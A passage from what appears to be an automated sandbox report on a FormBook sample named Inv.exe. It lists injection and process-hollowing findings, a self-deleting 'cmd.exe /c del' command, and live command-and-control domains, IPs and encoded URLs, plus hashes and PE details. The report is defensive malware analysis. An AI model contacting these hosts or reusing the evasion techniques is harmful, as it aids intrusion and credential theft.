          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4A70E mov eax, dword ptr fs:[00000030h]4_2_02E4A70E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3F716 mov eax, dword ptr fs:[00000030h]4_2_02E3F716
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EAFF10 mov eax, dword ptr fs:[00000030h]4_2_02EAFF10
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EAFF10 mov eax, dword ptr fs:[00000030h]4_2_02EAFF10
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED14FB mov eax, dword ptr fs:[00000030h]4_2_02ED14FB
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E96CF0 mov eax, dword ptr fs:[00000030h]4_2_02E96CF0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E96CF0 mov eax, dword ptr fs:[00000030h]4_2_02E96CF0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E96CF0 mov eax, dword ptr fs:[00000030h]4_2_02E96CF0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE8CD6 mov eax, dword ptr fs:[00000030h]4_2_02EE8CD6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E2849B mov eax, dword ptr fs:[00000030h]4_2_02E2849B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3746D mov eax, dword ptr fs:[00000030h]4_2_02E3746D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4A44B mov eax, dword ptr fs:[00000030h]4_2_02E4A44B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EAC450 mov eax, dword ptr fs:[00000030h]4_2_02EAC450
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EAC450 mov eax, dword ptr fs:[00000030h]4_2_02EAC450
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4BC2C mov eax, dword ptr fs:[00000030h]4_2_02E4BC2C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE740D mov eax, dword ptr fs:[00000030h]4_2_02EE740D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE740D mov eax, dword ptr fs:[00000030h]4_2_02EE740D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE740D mov eax, dword ptr fs:[00000030h]4_2_02EE740D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E96C0A mov eax, dword ptr fs:[00000030h]4_2_02E96C0A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E96C0A mov eax, dword ptr fs:[00000030h]4_2_02E96C0A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E96C0A mov eax, dword ptr fs:[00000030h]4_2_02E96C0A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E96C0A mov eax, dword ptr fs:[00000030h]4_2_02E96C0A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]4_2_02ED1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]4_2_02ED1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]4_2_02ED1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]4_2_02ED1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]4_2_02ED1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]4_2_02ED1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]4_2_02ED1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]4_2_02ED1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]4_2_02ED1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]4_2_02ED1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]4_2_02ED1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]4_2_02ED1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]4_2_02ED1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]4_2_02ED1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E2D5E0 mov eax, dword ptr fs:[00000030h]4_2_02E2D5E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E2D5E0 mov eax, dword ptr fs:[00000030h]4_2_02E2D5E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EDFDE2 mov eax, dword ptr fs:[00000030h]4_2_02EDFDE2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EDFDE2 mov eax, dword ptr fs:[00000030h]4_2_02EDFDE2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EDFDE2 mov eax, dword ptr fs:[00000030h]4_2_02EDFDE2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EDFDE2 mov eax, dword ptr fs:[00000030h]4_2_02EDFDE2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EC8DF1 mov eax, dword ptr fs:[00000030h]4_2_02EC8DF1
          Source: C:\Users\user\Desktop\Inv.exe, Code function: 0_2_01236B80 GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapAlloc
          Source: C:\Users\user\Desktop\Inv.exe, Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Process token adjusted: Debug
          Source: C:\Users\user\Desktop\Inv.exe, Code function: 0_2_0123C0A3 SetUnhandledExceptionFilter,UnhandledExceptionFilter
          Source: C:\Users\user\Desktop\Inv.exe, Code function: 0_2_0123C080 SetUnhandledExceptionFilter
          Source: C:\Users\user\Desktop\Inv.exe, Code function: 1_2_0123C0A3 SetUnhandledExceptionFilter,UnhandledExceptionFilter
          Source: C:\Users\user\Desktop\Inv.exe, Code function: 1_2_0123C080 SetUnhandledExceptionFilter

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe, Network Connect: 198.54.117.217 80
          Source: C:\Windows\explorer.exe, Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe, Network Connect: 172.96.186.206 80

          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\Inv.exe, Section loaded: unknown target: C:\Users\user\Desktop\Inv.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Inv.exe, Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Inv.exe, Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Users\user\Desktop\Inv.exe, Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\Inv.exe, Thread register set: target process: 3424
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Thread register set: target process: 3424

          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\Inv.exe, Thread APC queued: target process: C:\Windows\explorer.exe

          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\Inv.exe, Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 3F0000

          Source: C:\Users\user\Desktop\Inv.exe, Process created: C:\Users\user\Desktop\Inv.exe 'C:\Users\user\Desktop\Inv.exe'
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Inv.exe'
          Source: explorer.exe, 00000002.00000000.675251989.0000000000AD8000.00000004.00000020.sdmp, Binary or memory string: ProgmanMD6
          Source: explorer.exe, 00000002.00000002.1046948722.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.1047969407.0000000004280000.00000002.00000001.sdmp, Binary or memory string: Program Manager
          Source: explorer.exe, 00000002.00000002.1046948722.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.1047969407.0000000004280000.00000002.00000001.sdmp, Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000002.1046948722.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.1047969407.0000000004280000.00000002.00000001.sdmp, Binary or memory string: Progman
          Source: explorer.exe, 00000002.00000002.1046948722.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.1047969407.0000000004280000.00000002.00000001.sdmp, Binary or memory string: Progmanlock
          Source: explorer.exe, 00000002.00000000.690752068.000000000A716000.00000004.00000001.sdmp, Binary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\Inv.exe, Code function: 0_2_0123D7B7 cpuid
          Source: C:\Users\user\Desktop\Inv.exe, Code function: 0_2_01238431 GetLocalTime

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match, File source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook

          Mitre Att&ck Matrix

          | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
          |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
          | Valid Accounts | Command and Scripting Interpreter 2 | Path Interception | Process Injection 512 | Rootkit 1 | Credential API Hooking 1 | System Time Discovery 1 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
          | Default Accounts | Native API 1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion 2 | Input Capture 1 | Security Software Discovery 151 | Remote Desktop Protocol | Input Capture 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
          | Domain Accounts | Shared Modules 1 | Logon Script (Windows) | Logon Script (Windows) | Process Injection 512 | Security Account Manager | Virtualization/Sandbox Evasion 2 | SMB/Windows Admin Shares | Archive Collected Data 1 | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
          | Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information 1 | NTDS | Process Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 3 | SIM Card Swap | | Carrier Billing Fraud |
          | Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information 3 | LSA Secrets | Remote System Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
          | Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing 1 | Cached Domain Credentials | System Network Configuration Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
          | External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | System Network Connections Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
          | Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery 112 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |

          Behavior Graph

          [Behavior graph, ID 339347. Sample: Inv.exe; Startdate: 13/01/2021; Architecture: WINDOWS; Score: 100. Process chain: Inv.exe started a second Inv.exe, which injected into explorer.exe; explorer.exe started NETSTAT.EXE and autofmt.exe; NETSTAT.EXE started cmd.exe, which started conhost.exe. Graph image not preserved.]

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          | Source | Detection | Scanner | Label |
          |---|---|---|---|
          | Inv.exe | 39% | Virustotal | |
          | Inv.exe | 46% | ReversingLabs | Win32.Trojan.AgentTesla |
          | Inv.exe | 100% | Avira | HEUR/AGEN.1106536 |
          | Inv.exe | 100% | Joe Sandbox ML | |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          | Source | Detection | Scanner | Label |
          |---|---|---|---|
          | 0.2.Inv.exe.d90000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
          | 1.2.Inv.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |

          Domains

          | Source | Detection | Scanner | Label |
          |---|---|---|---|
          | www.hwcailing.com | 0% | Virustotal | |
          | millcityloam.com | 0% | Virustotal | |

          Domains and IPs

          Contacted Domains

          | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
          |---|---|---|---|---|---|
          | parkingpage.namecheap.com | 198.54.117.217 | true | false | | high |
          | www.hwcailing.com | 107.160.136.152 | true | false | | unknown |
          | millcityloam.com | 34.102.136.180 | true | true | | unknown |
          | www.achonabu.com | 172.96.186.206 | true | true | | unknown |
          | nationshiphop.com | 34.102.136.180 | true | true | | unknown |
          | www.zhaowulu.com | unknown | unknown | true | | unknown |
          | www.millcityloam.com | unknown | unknown | true | | unknown |
          | www.nationshiphop.com | unknown | unknown | true | | unknown |
          | www.a-zsolutionsllc.com | unknown | unknown | true | | unknown |
          | www.jacmkt.com | unknown | unknown | true | | unknown |

          Contacted URLs

          | Name | Malicious | Antivirus Detection | Reputation |
          |---|---|---|---|
          | http://www.a-zsolutionsllc.com/hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=eHiVknBCI+BDKnmhqMCE00F5l7UznldHUBBF08pOLsPmMyvxBhFlr4jwGXO1VYCPd09p | true | Avira URL Cloud: safe | unknown |
          | http://www.nationshiphop.com/hko6/?k2JxoV=oEk1uwcTzyLRlLIEQvULAWzRIM6BrJQxm2nmuYWQkJ+zIoa1KldNyrAb+1j5GiVi4vc4&OHiLR=jJBpdVbhUrMh9TJP | true | Avira URL Cloud: safe | unknown |
          | http://www.millcityloam.com/hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=9ExSQ4NEk+xqeDwz7kz53SpWI5tzJaWW64EQQFdVNavty5IFfZu+ty07sGNE8SwhRq/4 | true | Avira URL Cloud: safe | unknown |
          | http://www.achonabu.com/hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=Ds6mycG6XVC6cOnx6IQpHboGdSODTK5baT5OF1Gnzp/H9CBW+9tUucbuBNfXcxevyFer | true | Avira URL Cloud: safe | unknown |

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                                        http://www.founder.com.cn/cnexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.com/designers/frere-user.htmlexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                          high
                                          http://www.jiyu-kobo.co.jp/explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.com/designers8explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                            high
                                            http://www.%s.comPAexplorer.exe, 00000002.00000002.1048019987.0000000002B50000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            low
                                            http://www.fonts.comexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                              high
                                              http://www.sandoll.co.krexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.urwpp.deDPleaseexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.zhongyicts.com.cnexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.sakkal.comexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown

                                              Contacted IPs

                                              Public

                                              IP | Domain | Country | ASN | ASN Name | Malicious
                                              198.54.117.217 | unknown | United States | 22612 | NAMECHEAP-NETUS | false
                                              34.102.136.180 | unknown | United States | 15169 | GOOGLEUS | true
                                              172.96.186.206 | unknown | Canada | 32475 | SINGLEHOP-LLCUS | true

                                              General Information

                                              Joe Sandbox Version: 31.0.0 Red Diamond
                                              Analysis ID: 339347
                                              Start date: 13.01.2021
                                              Start time: 21:24:36
                                              Joe Sandbox Product: CloudBasic
                                              Overall analysis duration: 0h 10m 42s
                                              Hypervisor based Inspection enabled: false
                                              Report type: full
                                              Sample file name: Inv.exe
                                              Cookbook file name: default.jbs
                                              Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                              Number of analysed new started processes analysed: 19
                                              Number of new started drivers analysed: 0
                                              Number of existing processes analysed: 0
                                              Number of existing drivers analysed: 0
                                              Number of injected processes analysed: 1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode: default
                                              Analysis stop reason: Timeout
                                              Detection: MAL
                                              Classification: mal100.troj.evad.winEXE@8/0@7/3
                                              EGA Information: Failed
                                              HDC Information:
                                              • Successful, ratio: 22.1% (good quality ratio 20%)
                                              • Quality average: 74.8%
                                              • Quality standard deviation: 31.6%
                                              HCA Information:
                                              • Successful, ratio: 98%
                                              • Number of executed functions: 77
                                              • Number of non-executed functions: 85
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .exe
                                              Warnings:
                                              • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                              • Excluded IPs from analysis (whitelisted): 52.147.198.201, 13.64.90.137, 51.104.139.180, 2.20.142.209, 2.20.142.210, 52.155.217.156, 20.54.26.129, 92.122.213.194, 92.122.213.247
                                              • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, arc.msn.com.nsatc.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus16.cloudapp.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net

                                              Simulations

                                              Behavior and APIs

                                              No simulations

                                              Joe Sandbox View / Context

                                              IPs


                                              Domains


                                              ASN


                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              No created / dropped files found

                                              Static File Info

                                              General

                                              File type: PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit): 7.638953617352006
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name: Inv.exe
                                              File size: 333824
                                              MD5: a3aba7d40da6c8c86e4e8d035803f314
                                              SHA1: 469b36f05939d6ec6457f1b72ba9f6c7a960be06
                                              SHA256: 1f94eb81e3cde4f677fd210e1ff7f5d06987cbdc2fa7de79e28b224e49244b40
                                              SHA512: 2cfa59a865a8292b98fb3e8e6ae79a4613d773be87c927ba4cc8e0f034010c0e5ebd0b85a74ca02ef59d47335908bcc610a597bc9cbfbfaaf364d76f51fff2fc
                                              SSDEEP: 6144:Sr1I5DbAQcHAORYANcRgOUdQMgV96O5cBTe3pGiO3nhpPgMWOwihgTSE:W1I5fAPHdTdzgV98TetO3hKMMQgT9
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........tj.m'j.m'j.m'.Q.'k.m'.4.'I.m'.4.'r.m'.4.'..m'j.l'..m'...'..m'M7.'k.m'M7.'k.m'M7.'k.m'Richj.m'................PE..L......_...

                                              File Icon

Icon Hash: 00828e8e8686b000

                                              Static PE Info

                                              General

Entrypoint: 0x4088a7
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x5FFEE5F0 [Wed Jan 13 12:22:08 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: e7da020c2fad0c59a3d5e97971484548

                                              Entrypoint Preview

                                              Instruction
                                              call 00007FEC4CE0A261h
                                              jmp 00007FEC4CE02EC5h
                                              push 00000014h
                                              push 0041D838h
                                              call 00007FEC4CE03768h
                                              call 00007FEC4CE06616h
                                              movzx esi, ax
                                              push 00000002h
                                              call 00007FEC4CE0A1F4h
                                              pop ecx
                                              mov eax, 00005A4Dh
                                              cmp word ptr [00400000h], ax
                                              je 00007FEC4CE02EC6h
                                              xor ebx, ebx
                                              jmp 00007FEC4CE02EF5h
                                              mov eax, dword ptr [0040003Ch]
                                              cmp dword ptr [eax+00400000h], 00004550h
                                              jne 00007FEC4CE02EADh
                                              mov ecx, 0000010Bh
                                              cmp word ptr [eax+00400018h], cx
                                              jne 00007FEC4CE02E9Fh
                                              xor ebx, ebx
                                              cmp dword ptr [eax+00400074h], 0Eh
                                              jbe 00007FEC4CE02ECBh
                                              cmp dword ptr [eax+004000E8h], ebx
                                              setne bl
                                              mov dword ptr [ebp-1Ch], ebx
                                              call 00007FEC4CE07603h
                                              test eax, eax
                                              jne 00007FEC4CE02ECAh
                                              push 0000001Ch
                                              call 00007FEC4CE02F95h
                                              pop ecx
                                              call 00007FEC4CE07C6Ch
                                              test eax, eax
                                              jne 00007FEC4CE02ECAh
                                              push 00000010h
                                              call 00007FEC4CE02F84h
                                              pop ecx
                                              call 00007FEC4CE063A8h
                                              and dword ptr [ebp-04h], 00000000h
                                              call 00007FEC4CE04B43h
                                              call dword ptr [004180C8h]
                                              mov dword ptr [00424080h], eax
                                              call 00007FEC4CE0A252h
                                              mov dword ptr [00422284h], eax
                                              call 00007FEC4CE09E53h
                                              test eax, eax
                                              jns 00007FEC4CE02ECAh
                                              push 00000008h
                                              call 00007FEC4CE01A7Ah
                                              pop ecx
                                              call 00007FEC4CE0A06Fh

                                              Rich Headers

                                              Programming Language:
                                              • [LNK] VS2012 build 50727
                                              • [RES] VS2012 build 50727
                                              • [ C ] VS2012 build 50727

                                              Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1db94 | 0xdc | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x25000 | 0x1a78 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x27000 | 0x1150 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x1d6e0 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x18000 | 0x1c8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                              Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x16d9a | 0x16e00 | False | 0.571176997951 | data | 6.6738730891 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x18000 | 0x64f8 | 0x6600 | False | 0.572227328431 | data | 6.01779519415 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x1f000 | 0x5098 | 0x3400 | False | 0.285531850962 | data | 4.70097691284 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x25000 | 0x1a78 | 0x1c00 | False | 0.9453125 | data | 7.75466359197 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x27000 | 0x1798 | 0x1800 | False | 0.606770833333 | data | 5.55476531064 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

Name | RVA | Size | Type | Language | Country
RT_RCDATA | 0x25070 | 0x1a05 | data | English | United States

                                              Imports

DLL | Import
